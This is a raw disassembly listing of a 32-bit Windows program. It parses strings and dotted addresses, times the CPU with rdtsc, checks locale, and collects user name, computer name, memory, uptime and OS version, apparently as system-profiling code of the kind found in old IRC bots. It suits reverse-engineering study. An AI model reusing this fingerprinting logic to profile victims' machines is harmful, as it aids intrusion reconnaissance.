jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: sub_4083AD+2F2�p
; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: sub_41349C+192�p
; sub_41349C+3DA�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41EFD8
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset dword_418F54
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: sub_41349C+12A�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41EFD8
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset dword_418F54
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: sub_4083AD+3A4�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset off_419100
push [ebp+arg_0]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083AD proc near ; DATA XREF: sub_4087C4+35�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_734 = byte ptr -734h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_714 = dword ptr -714h
var_710 = dword ptr -710h
var_70C = dword ptr -70Ch
var_708 = byte ptr -708h
var_6F0 = dword ptr -6F0h
var_6EC = dword ptr -6ECh
var_6E8 = dword ptr -6E8h
var_6E4 = dword ptr -6E4h
var_6E0 = byte ptr -6E0h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = byte ptr -6C8h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_409 = byte ptr -409h
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_6CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_734]
push eax
call dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp+var_72C]
add eax, 100000h
shr eax, 14h
mov [ebp+var_6F0], eax
mov eax, [ebp+var_728]
add eax, 100000h
shr eax, 14h
mov [ebp+var_738], eax
call sub_4092A4
mov [ebp+var_714], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_6E8], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_6E4], eax
mov [ebp+var_8], 15h
mov [ebp+var_6D0], 10h
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_708]
push eax
call dword_417018 ; GetUserNameA
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_6E0]
push eax
call dword_417078 ; GetComputerNameA
mov [ebp+var_520], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_51C]
rep stosd
lea eax, [ebp+var_520]
push eax
call dword_417030 ; GetVersionExA
mov [ebp+var_48C], offset a? ; "?"
mov [ebp+var_710], offset aNoSp ; "no SP"
cmp [ebp+var_51C], 4
jnz short loc_408522
cmp [ebp+var_518], 0
jnz short loc_408522
cmp [ebp+var_510], 1
jnz short loc_40850A
mov [ebp+var_48C], offset a95 ; "95"
loc_40850A: ; CODE XREF: sub_4083AD+151�j
cmp [ebp+var_510], 2
jnz short loc_40851D
mov [ebp+var_48C], offset aNt ; "NT"
loc_40851D: ; CODE XREF: sub_4083AD+164�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_4083AD+13F�j
; sub_4083AD+148�j
cmp [ebp+var_51C], 4
jnz short loc_408540
cmp [ebp+var_518], 0Ah
jnz short loc_408540
mov [ebp+var_48C], offset a98 ; "98"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4083AD+17C�j
; sub_4083AD+185�j
cmp [ebp+var_51C], 4
jnz short loc_40855E
cmp [ebp+var_518], 5Ah
jnz short loc_40855E
mov [ebp+var_48C], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4083AD+19A�j
; sub_4083AD+1A3�j
